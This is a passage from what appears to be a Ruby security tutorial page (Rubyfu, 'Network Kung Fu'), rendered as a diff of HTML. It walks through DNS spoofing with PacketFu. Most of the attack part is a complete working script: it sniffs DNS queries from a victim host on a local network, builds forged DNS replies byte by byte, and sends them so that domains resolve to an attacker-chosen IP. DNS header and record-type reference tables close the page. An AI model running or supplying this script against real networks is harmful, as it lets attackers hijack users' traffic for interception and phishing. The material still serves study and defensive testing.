+
puts <span class="hljs-string">"ERROR : THE RAW STARTS WITH 0"</span>
|
|
1329
|
+
<span class="hljs-keyword">return</span> raw_domain[<span class="hljs-number">1</span>..-<span class="hljs-number">1</span>]
|
|
1330
|
+
<span class="hljs-keyword">end</span>
|
|
1331
|
+
|
|
1332
|
+
fqdn = <span class="hljs-string">""</span>
|
|
1333
|
+
length_offset = raw_domain[<span class="hljs-number">0</span>].ord
|
|
1334
|
+
full_length = raw_domain[ <span class="hljs-number">0</span>..length_offset ].length
|
|
1335
|
+
domain_name = raw_domain[(full_length - length_offset)..length_offset]
|
|
1336
|
+
|
|
1337
|
+
<span class="hljs-keyword">while</span> length_offset != <span class="hljs-number">0</span>
|
|
1338
|
+
fqdn << domain_name + <span class="hljs-string">"."</span>
|
|
1339
|
+
length_offset = raw_domain[full_length].ord
|
|
1340
|
+
domain_name = raw_domain[full_length + <span class="hljs-number">1</span>..full_length + length_offset]
|
|
1341
|
+
full_length = raw_domain[<span class="hljs-number">0</span>..full_length + length_offset].length
|
|
1342
|
+
<span class="hljs-keyword">end</span>
|
|
1343
|
+
|
|
1344
|
+
<span class="hljs-keyword">return</span> fqdn.chomp!(<span class="hljs-string">'.'</span>)
|
|
1345
|
+
<span class="hljs-keyword">end</span>
|
|
1346
|
+
|
|
1347
|
+
<span class="hljs-comment"># * We need parse/analyze the valid UDP packets only</span>
|
|
1348
|
+
<span class="hljs-comment"># * We need to make sure this packet is a DNS query</span>
|
|
1349
|
+
<span class="hljs-comment">#</span>
|
|
1350
|
+
<span class="hljs-comment"># Find the DNS packets</span>
|
|
1351
|
+
<span class="hljs-comment">#</span>
|
|
1352
|
+
capture.stream.each <span class="hljs-keyword">do</span> |pkt|
|
|
1353
|
+
<span class="hljs-comment"># Make sure we can parse the packet; if we can, parse it</span>
|
|
1354
|
+
<span class="hljs-keyword">if</span> <span class="hljs-constant">UDPPacket</span>.can_parse?(pkt)
|
|
1355
|
+
<span class="hljs-variable">@packet</span> = <span class="hljs-constant">Packet</span>.parse(pkt)
|
|
1356
|
+
|
|
1357
|
+
<span class="hljs-comment"># Make sure we have a query packet</span>
|
|
1358
|
+
dns_query = <span class="hljs-variable">@packet</span>.payload[<span class="hljs-number">2</span>..<span class="hljs-number">3</span>].to_s
|
|
1359
|
+
|
|
1360
|
+
<span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">"\x01\x00"</span>
|
|
1361
|
+
<span class="hljs-comment"># Get the domain name into a readable format</span>
|
|
1362
|
+
domain_name = <span class="hljs-variable">@packet</span>.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL QUERY</span>
|
|
1363
|
+
fqdn = readable(domain_name)
|
|
1364
|
+
|
|
1365
|
+
<span class="hljs-comment"># Ignore non query packet</span>
|
|
1366
|
+
<span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> domain_name.<span class="hljs-keyword">nil</span>?
|
|
1367
|
+
|
|
1368
|
+
puts <span class="hljs-string">"DNS request for: "</span> + fqdn
|
|
1369
|
+
<span class="hljs-keyword">end</span>
|
|
1370
|
+
<span class="hljs-keyword">end</span>
|
|
1371
|
+
<span class="hljs-keyword">end</span>
|
|
1372
|
+
</code></pre>
|
|
1373
|
+
<p>Till now we successfully finished <a href="module_0x3__network_kung_fu/arp_spoofing.md">ARP Spoofing</a> then DNS capturing but still we need to replace/spoof the original response to our domain. e.g. attacker.zone, now we have to build a DNS response instead of spoofed to be sent. So what we need?</p>
|
|
1374
|
+
<ul>
|
|
1375
|
+
<li>taking the IP we are going to redirect the user to (the spoofing_ip)<ul>
|
|
1376
|
+
<li>converting it into hex using the <code>to_i</code> and <code>pack</code> methods.</li>
|
|
1377
|
+
</ul>
|
|
1378
|
+
</li>
|
|
1379
|
+
<li>From there we create a new UDP packet using the data contained in <code>@ourInfo</code> (IP and MAC) and fill in the normal UDP fields.<ul>
|
|
1380
|
+
<li>I take most of this information straight from the DNS Query packet.</li>
|
|
1381
|
+
</ul>
|
|
1382
|
+
</li>
|
|
1383
|
+
<li>The next step is to create the DNS Response.<ul>
|
|
1384
|
+
<li>the best way to understand the code here is to look at a DNS header and then</li>
|
|
1385
|
+
<li>take the bit map of the HEX values and apply them to the header.</li>
|
|
1386
|
+
<li>This will let you see what flags are being set.</li>
|
|
1387
|
+
</ul>
|
|
1388
|
+
</li>
|
|
1389
|
+
<li>From here, we just calculate the checksum for the UDP packet and send it out to the target's machine.</li>
|
|
1390
|
+
</ul>
|
|
1391
|
+
<table>
|
|
1392
|
+
<thead>
|
|
1393
|
+
<tr>
|
|
1394
|
+
<th style="text-align:center"><img src="dns_spoofing_Wireshark2.png" alt="Wireshark"></th>
|
|
1395
|
+
</tr>
|
|
1396
|
+
</thead>
|
|
1397
|
+
<tbody>
|
|
1398
|
+
<tr>
|
|
1399
|
+
<td style="text-align:center"><strong>Figure 2.</strong> DNS Response Payload</td>
|
|
1400
|
+
</tr>
|
|
1401
|
+
</tbody>
|
|
1402
|
+
</table>
|
|
1403
|
+
<pre><code class="lang-ruby">
|
|
1404
|
+
spoofing_ip = <span class="hljs-string">"69.171.234.21"</span>
|
|
1405
|
+
spoofing_ip.split(<span class="hljs-string">'.'</span>).map {|octet| octet.to_i}.pack(<span class="hljs-string">'c*'</span>)
|
|
1406
|
+
|
|
1407
|
+
response = <span class="hljs-constant">UDPPacket</span>.new(<span class="hljs-symbol">:config</span> => <span class="hljs-constant">PacketFu::Utils</span>.ifconfig(<span class="hljs-string">"wlan0"</span>))
|
|
1408
|
+
response.udp_src = packet.udp_dst
|
|
1409
|
+
response.udp_dst = packet.udp_src
|
|
1410
|
+
response.ip_saddr = packet.ip_daddr
|
|
1411
|
+
response.ip_daddr = <span class="hljs-string">"192.168.0.21"</span>
|
|
1412
|
+
response.eth_daddr = <span class="hljs-string">"00:0C:29:38:1D:61"</span>
|
|
1413
|
+
</code></pre>
|
|
1414
|
+
<p>Wrapping up </p>
|
|
1415
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
|
1416
|
+
<span class="hljs-comment"># -*- coding: binary -*-</span>
|
|
1417
|
+
|
|
1418
|
+
<span class="hljs-comment"># Start the capture process</span>
|
|
1419
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'packetfu'</span>
|
|
1420
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'pp'</span>
|
|
1421
|
+
<span class="hljs-keyword">include</span> <span class="hljs-constant">PacketFu</span>
|
|
1422
|
+
|
|
1423
|
+
|
|
1424
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">readable</span><span class="hljs-params">(raw_domain)</span></span>
|
|
1425
|
+
|
|
1426
|
+
<span class="hljs-comment"># Prevent processing non domain</span>
|
|
1427
|
+
<span class="hljs-keyword">if</span> raw_domain[<span class="hljs-number">0</span>].ord == <span class="hljs-number">0</span>
|
|
1428
|
+
puts <span class="hljs-string">"ERROR : THE RAW STARTS WITH 0"</span>
|
|
1429
|
+
<span class="hljs-keyword">return</span> raw_domain[<span class="hljs-number">1</span>..-<span class="hljs-number">1</span>]
|
|
1430
|
+
<span class="hljs-keyword">end</span>
|
|
1431
|
+
|
|
1432
|
+
fqdn = <span class="hljs-string">""</span>
|
|
1433
|
+
length_offset = raw_domain[<span class="hljs-number">0</span>].ord
|
|
1434
|
+
full_length = raw_domain[ <span class="hljs-number">0</span>..length_offset ].length
|
|
1435
|
+
domain_name = raw_domain[(full_length - length_offset)..length_offset]
|
|
1436
|
+
|
|
1437
|
+
<span class="hljs-keyword">while</span> length_offset != <span class="hljs-number">0</span>
|
|
1438
|
+
fqdn << domain_name + <span class="hljs-string">"."</span>
|
|
1439
|
+
length_offset = raw_domain[full_length].ord
|
|
1440
|
+
domain_name = raw_domain[full_length + <span class="hljs-number">1</span> .. full_length + length_offset]
|
|
1441
|
+
full_length = raw_domain[<span class="hljs-number">0</span> .. full_length + length_offset].length
|
|
1442
|
+
<span class="hljs-keyword">end</span>
|
|
1443
|
+
|
|
1444
|
+
<span class="hljs-keyword">return</span> fqdn.chomp!(<span class="hljs-string">'.'</span>)
|
|
1445
|
+
<span class="hljs-keyword">end</span>
|
|
1446
|
+
|
|
1447
|
+
<span class="hljs-comment">#</span>
|
|
1448
|
+
<span class="hljs-comment"># Send Response</span>
|
|
1449
|
+
<span class="hljs-comment">#</span>
|
|
1450
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">spoof_response</span><span class="hljs-params">(packet, domain)</span></span>
|
|
1451
|
+
|
|
1452
|
+
attackerdomain_name = <span class="hljs-string">'rubyfu.net'</span>
|
|
1453
|
+
attackerdomain_ip = <span class="hljs-string">'54.243.253.221'</span>.split(<span class="hljs-string">'.'</span>).map {|oct| oct.to_i}.pack(<span class="hljs-string">'c*'</span>) <span class="hljs-comment"># Spoofing IP</span>
|
|
1454
|
+
|
|
1455
|
+
<span class="hljs-comment"># Build UDP packet</span>
|
|
1456
|
+
response = <span class="hljs-constant">UDPPacket</span>.new(<span class="hljs-symbol">:config</span> => <span class="hljs-constant">PacketFu::Utils</span>.ifconfig(<span class="hljs-string">"wlan0"</span>))
|
|
1457
|
+
response.udp_src = packet.udp_dst <span class="hljs-comment"># source port</span>
|
|
1458
|
+
response.udp_dst = packet.udp_src <span class="hljs-comment"># destination port</span>
|
|
1459
|
+
response.ip_saddr = packet.ip_daddr <span class="hljs-comment"># modem's IP address to be source</span>
|
|
1460
|
+
response.ip_daddr = packet.ip_saddr <span class="hljs-comment"># victim's IP address to be destination</span>
|
|
1461
|
+
response.eth_daddr = packet.eth_saddr <span class="hljs-comment"># the victim's MAC address</span>
|
|
1462
|
+
response.payload = packet.payload[<span class="hljs-number">0</span>,<span class="hljs-number">1</span>] <span class="hljs-comment"># Transaction ID</span>
|
|
1463
|
+
response.payload += <span class="hljs-string">"\x81\x80"</span> <span class="hljs-comment"># Flags: Reply code: No error (0)</span>
|
|
1464
|
+
response.payload += <span class="hljs-string">"\x00\x01"</span> <span class="hljs-comment"># Question: 1</span>
|
|
1465
|
+
response.payload += <span class="hljs-string">"\x00\x00"</span> <span class="hljs-comment"># Answer RRs: 0</span>
|
|
1466
|
+
response.payload += <span class="hljs-string">"\x00\x00"</span> <span class="hljs-comment"># Authority RRs: 0</span>
|
|
1467
|
+
response.payload += <span class="hljs-string">"\x00\x00"</span> <span class="hljs-comment"># Additional RRs: 0</span>
|
|
1468
|
+
response.payload += attackerdomain_name.split(<span class="hljs-string">'.'</span>).map <span class="hljs-keyword">do</span> |section| <span class="hljs-comment"># Queries | Name: , Convert domain to DNS style(the opposite of readable method)</span>
|
|
1469
|
+
[section.size.chr, section.chars.map {|c| <span class="hljs-string">'\x%x'</span> % c.ord}.join]
|
|
1470
|
+
<span class="hljs-keyword">end</span>.join + <span class="hljs-string">"\x00"</span>
|
|
1471
|
+
response.payload += <span class="hljs-string">"\x00\x01"</span> <span class="hljs-comment"># Queries | Type: A (Host address)</span>
|
|
1472
|
+
response.payload += <span class="hljs-string">"\x00\x01"</span> <span class="hljs-comment"># Queries | Class: IN (0x0001)</span>
|
|
1473
|
+
response.payload += <span class="hljs-string">"\xc0\x0c"</span> <span class="hljs-comment"># Answer | Name: twitter.com</span>
|
|
1474
|
+
response.payload += <span class="hljs-string">"\x00\x01"</span> <span class="hljs-comment"># Answer | Type: A (Host address)</span>
|
|
1475
|
+
response.payload += <span class="hljs-string">"\x00\x01"</span> <span class="hljs-comment"># Answer | Class: IN (0x0001)</span>
|
|
1476
|
+
response.payload += <span class="hljs-string">"\x00\x00\x00\x25"</span> <span class="hljs-comment"># Answer | Time to live: 37 seconds</span>
|
|
1477
|
+
response.payload += <span class="hljs-string">"\x00\x04"</span> <span class="hljs-comment"># Answer | Data length: 4</span>
|
|
1478
|
+
response.payload += attackerdomain_ip <span class="hljs-comment"># Answer | Addr</span>
|
|
1479
|
+
response.recalc <span class="hljs-comment"># Calculate the packet</span>
|
|
1480
|
+
response.to_w(response.iface) <span class="hljs-comment"># Send the packet through our interface</span>
|
|
1481
|
+
<span class="hljs-keyword">end</span>
|
|
1482
|
+
|
|
1483
|
+
filter = <span class="hljs-string">"udp and port 53 and host "</span> + <span class="hljs-string">"192.168.0.21"</span>
|
|
1484
|
+
<span class="hljs-variable">@capture</span> = <span class="hljs-constant">Capture</span>.new(<span class="hljs-symbol">:iface</span> => <span class="hljs-string">"wlan0"</span>, <span class="hljs-symbol">:start</span> => <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:promisc</span> => <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:filter</span> => filter, <span class="hljs-symbol">:save</span> => <span class="hljs-keyword">true</span>)
|
|
1485
|
+
<span class="hljs-comment"># Find the DNS packets</span>
|
|
1486
|
+
<span class="hljs-variable">@capture</span>.stream.each <span class="hljs-keyword">do</span> |pkt|
|
|
1487
|
+
<span class="hljs-comment"># Make sure we can parse the packet; if we can, parse it</span>
|
|
1488
|
+
<span class="hljs-keyword">if</span> <span class="hljs-constant">UDPPacket</span>.can_parse?(pkt)
|
|
1489
|
+
packet = <span class="hljs-constant">Packet</span>.parse(pkt)
|
|
1490
|
+
|
|
1491
|
+
<span class="hljs-comment"># Get the offset of the query type: (request=\x01\x00, response=\x81\x80)</span>
|
|
1492
|
+
dns_query = packet.payload[<span class="hljs-number">2</span>..<span class="hljs-number">3</span>].to_s
|
|
1493
|
+
|
|
1494
|
+
<span class="hljs-comment"># Make sure we have a dns query packet</span>
|
|
1495
|
+
<span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">"\x01\x00"</span>
|
|
1496
|
+
<span class="hljs-comment"># Get the domain name into a readable format</span>
|
|
1497
|
+
domain_name = packet.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL DOMAIN</span>
|
|
1498
|
+
fqdn = readable(domain_name)
|
|
1499
|
+
<span class="hljs-comment"># Ignore non query packet</span>
|
|
1500
|
+
<span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> domain_name.<span class="hljs-keyword">nil</span>?
|
|
1501
|
+
puts <span class="hljs-string">"DNS request for: "</span> + fqdn
|
|
1502
|
+
|
|
1503
|
+
<span class="hljs-keyword">end</span>
|
|
1504
|
+
<span class="hljs-comment"># Make sure we have a dns reply packet</span>
|
|
1505
|
+
<span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">"\x81\x80"</span>
|
|
1506
|
+
domain_name = packet.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL DOMAIN</span>
|
|
1507
|
+
fqdn = readable(domain_name)
|
|
1508
|
+
puts <span class="hljs-string">"[*] Start Spoofing: "</span> + fqdn
|
|
1509
|
+
spoof_response packet, domain_name
|
|
1510
|
+
<span class="hljs-keyword">end</span>
|
|
1511
|
+
|
|
1512
|
+
<span class="hljs-keyword">end</span>
|
|
1513
|
+
<span class="hljs-keyword">end</span>
|
|
1514
|
+
</code></pre>
|
|
1515
|
+
<p><a href="https://github.com/SilverFoxx/Spoofa/blob/master/spoofa" target="_blank">https://github.com/SilverFoxx/Spoofa/blob/master/spoofa</a></p>
|
|
1516
|
+
<p>Sources<sup><a href="#fn_1" id="reffn_1">1</a></sup> <sup><a href="#fn_2" id="reffn_2">2</a></sup> - The code has been modified and fixed</p>
|
|
1517
|
+
<h2 id=""><a name="" class="plugin-anchor" href="#"><span class="fa fa-link"></span></a><br><br><br></h2>
|
|
1518
|
+
<blockquote id="fn_1">
|
|
1519
|
+
<sup>1</sup>. <a href="http://crushbeercrushcode.org/2012/10/ruby-dns-spoofing-using-packetfu/" target="_blank">DNS Spoofing Using PacketFu</a><a href="#reffn_1" title="Jump back to footnote [1] in the text."> ↩</a>
|
|
1520
|
+
</blockquote>
|
|
1521
|
+
<blockquote id="fn_2">
|
|
1522
|
+
<sup>2</sup>. <a href="http://tuftsdev.github.io/DefenseOfTheDarkArts/assignments/manipulatingthenetworkwithpacketfu-110314111058-phpapp01.pdf" target="_blank">Manipulating The Network with PacketFu</a><a href="#reffn_2" title="Jump back to footnote [2] in the text."> ↩</a>
|
|
1523
|
+
</blockquote>
|
|
1524
|
+
<blockquote id="fn_3">
|
|
1525
|
+
<sup>3</sup>. <a href="http://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-12" target="_blank">DNS Header Flags</a><a href="#reffn_3" title="Jump back to footnote [3] in the text."> ↩</a>
|
|
1526
|
+
</blockquote>
|
|
1527
|
+
<table>
|
|
1528
|
+
<thead>
|
|
1529
|
+
<tr>
|
|
1530
|
+
<th style="text-align:center">Bit</th>
|
|
1531
|
+
<th>Flag</th>
|
|
1532
|
+
<th>Description</th>
|
|
1533
|
+
<th>Reference</th>
|
|
1534
|
+
</tr>
|
|
1535
|
+
</thead>
|
|
1536
|
+
<tbody>
|
|
1537
|
+
<tr>
|
|
1538
|
+
<td style="text-align:center">bit 5</td>
|
|
1539
|
+
<td>AA</td>
|
|
1540
|
+
<td>Authoritative Answer</td>
|
|
1541
|
+
<td>[RFC1035]</td>
|
|
1542
|
+
</tr>
|
|
1543
|
+
<tr>
|
|
1544
|
+
<td style="text-align:center">bit 6</td>
|
|
1545
|
+
<td>TC</td>
|
|
1546
|
+
<td>Truncated Response</td>
|
|
1547
|
+
<td>[RFC1035]</td>
|
|
1548
|
+
</tr>
|
|
1549
|
+
<tr>
|
|
1550
|
+
<td style="text-align:center">bit 7</td>
|
|
1551
|
+
<td>RD</td>
|
|
1552
|
+
<td>Recursion Desired</td>
|
|
1553
|
+
<td>[RFC1035]</td>
|
|
1554
|
+
</tr>
|
|
1555
|
+
<tr>
|
|
1556
|
+
<td style="text-align:center">bit 8</td>
|
|
1557
|
+
<td>RA</td>
|
|
1558
|
+
<td>Recursion Allowed</td>
|
|
1559
|
+
<td>[RFC1035]</td>
|
|
1560
|
+
</tr>
|
|
1561
|
+
<tr>
|
|
1562
|
+
<td style="text-align:center">bit 9</td>
|
|
1563
|
+
<td></td>
|
|
1564
|
+
<td>Reserved</td>
|
|
1565
|
+
<td></td>
|
|
1566
|
+
</tr>
|
|
1567
|
+
<tr>
|
|
1568
|
+
<td style="text-align:center">bit 10</td>
|
|
1569
|
+
<td>AD</td>
|
|
1570
|
+
<td>Authentic Data</td>
|
|
1571
|
+
<td>[RFC4035]</td>
|
|
1572
|
+
</tr>
|
|
1573
|
+
<tr>
|
|
1574
|
+
<td style="text-align:center">bit 11</td>
|
|
1575
|
+
<td>CD</td>
|
|
1576
|
+
<td>Checking Disabled</td>
|
|
1577
|
+
<td>[RFC4035]</td>
|
|
1578
|
+
</tr>
|
|
1579
|
+
</tbody>
|
|
1580
|
+
</table>
|
|
1581
|
+
<blockquote id="fn_4">
|
|
1582
|
+
<sup>4</sup>. <a href="http://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-4" target="_blank">DNS Lookups Types</a><a href="#reffn_4" title="Jump back to footnote [4] in the text."> ↩</a>
|
|
1583
|
+
</blockquote>
|
|
1584
|
+
<table>
|
|
1585
|
+
<thead>
|
|
1586
|
+
<tr>
|
|
1587
|
+
<th style="text-align:center">Type</th>
|
|
1588
|
+
<th style="text-align:center">Value</th>
|
|
1589
|
+
<th style="text-align:center">Description</th>
|
|
1590
|
+
</tr>
|
|
1591
|
+
</thead>
|
|
1592
|
+
<tbody>
|
|
1593
|
+
<tr>
|
|
1594
|
+
<td style="text-align:center">A</td>
|
|
1595
|
+
<td style="text-align:center">1</td>
|
|
1596
|
+
<td style="text-align:center">IP Address</td>
|
|
1597
|
+
</tr>
|
|
1598
|
+
<tr>
|
|
1599
|
+
<td style="text-align:center">NS</td>
|
|
1600
|
+
<td style="text-align:center">2</td>
|
|
1601
|
+
<td style="text-align:center">Name Server</td>
|
|
1602
|
+
</tr>
|
|
1603
|
+
<tr>
|
|
1604
|
+
<td style="text-align:center">CNAME</td>
|
|
1605
|
+
<td style="text-align:center">5</td>
|
|
1606
|
+
<td style="text-align:center">Alias of a domain name</td>
|
|
1607
|
+
</tr>
|
|
1608
|
+
<tr>
|
|
1609
|
+
<td style="text-align:center">PTR</td>
|
|
1610
|
+
<td style="text-align:center">12</td>
|
|
1611
|
+
<td style="text-align:center">Reverse DNS Lookup using the IP Address</td>
|
|
1612
|
+
</tr>
|
|
1613
|
+
<tr>
|
|
1614
|
+
<td style="text-align:center">HINFO</td>
|
|
1615
|
+
<td style="text-align:center">13</td>
|
|
1616
|
+
<td style="text-align:center">Host Information</td>
|
|
1617
|
+
</tr>
|
|
1618
|
+
<tr>
|
|
1619
|
+
<td style="text-align:center">MX</td>
|
|
1620
|
+
<td style="text-align:center">15</td>
|
|
1621
|
+
<td style="text-align:center">MX Record</td>
|
|
1622
|
+
</tr>
|
|
1623
|
+
<tr>
|
|
1624
|
+
<td style="text-align:center">AXFR</td>
|
|
1625
|
+
<td style="text-align:center">252</td>
|
|
1626
|
+
<td style="text-align:center">Request for Zone Transfer</td>
|
|
1627
|
+
</tr>
|
|
1628
|
+
<tr>
|
|
1629
|
+
<td style="text-align:center">ANY</td>
|
|
1630
|
+
<td style="text-align:center">255</td>
|
|
1631
|
+
<td style="text-align:center">Request for All Records</td>
|
|
1632
|
+
</tr>
|
|
1633
|
+
</tbody>
|
|
1634
|
+
</table>
|
|
1635
|
+
|
|
1636
|
+
|
|
1637
|
+
</section>
|
|
1638
|
+
|
|
1639
|
+
|
|
1640
|
+
</div>
|
|
1641
|
+
</div>
|
|
1642
|
+
</div>
|
|
1643
|
+
|
|
1644
|
+
|
|
1645
|
+
<a href="../module_0x3__network_kung_fu/arp_spoofing.html" class="navigation navigation-prev " aria-label="Previous page: ARP Spoofing"><i class="fa fa-angle-left"></i></a>
|
|
1646
|
+
|
|
1647
|
+
|
|
1648
|
+
<a href="../module_0x4__web_kung_fu/index.html" class="navigation navigation-next " aria-label="Next page: Module 0x4 | Web Kung Fu"><i class="fa fa-angle-right"></i></a>
|
|
1649
|
+
|
|
1650
|
+
</div>
|
|
1651
|
+
</div>
|
|
1652
|
+
|
|
1653
|
+
|
|
1654
|
+
<script src="../gitbook/app.js"></script>
|
|
1655
|
+
|
|
1656
|
+
|
|
1657
|
+
<script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
|
|
1658
|
+
|
|
1659
|
+
|
|
1660
|
+
|
|
1661
|
+
<script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
|
|
1662
|
+
|
|
1663
|
+
|
|
1664
|
+
|
|
1665
|
+
<script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
|
|
1666
|
+
|
|
1667
|
+
|
|
1668
|
+
|
|
1669
|
+
<script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
|
|
1670
|
+
|
|
1671
|
+
|
|
1672
|
+
|
|
1673
|
+
<script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
|
|
1674
|
+
|
|
1675
|
+
|
|
1676
|
+
|
|
1677
|
+
<script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
|
|
1678
|
+
|
|
1679
|
+
|
|
1680
|
+
|
|
1681
|
+
<script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
|
|
1682
|
+
|
|
1683
|
+
|
|
1684
|
+
<script>
|
|
1685
|
+
require(["gitbook"], function(gitbook) {
|
|
1686
|
+
var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
|
|
1687
|
+
gitbook.start(config);
|
|
1688
|
+
});
|
|
1689
|
+
</script>
|
|
1690
|
+
|
|
1691
|
+
|
|
1692
|
+
</body>
|
|
1693
|
+
|
|
1694
|
+
</html>
|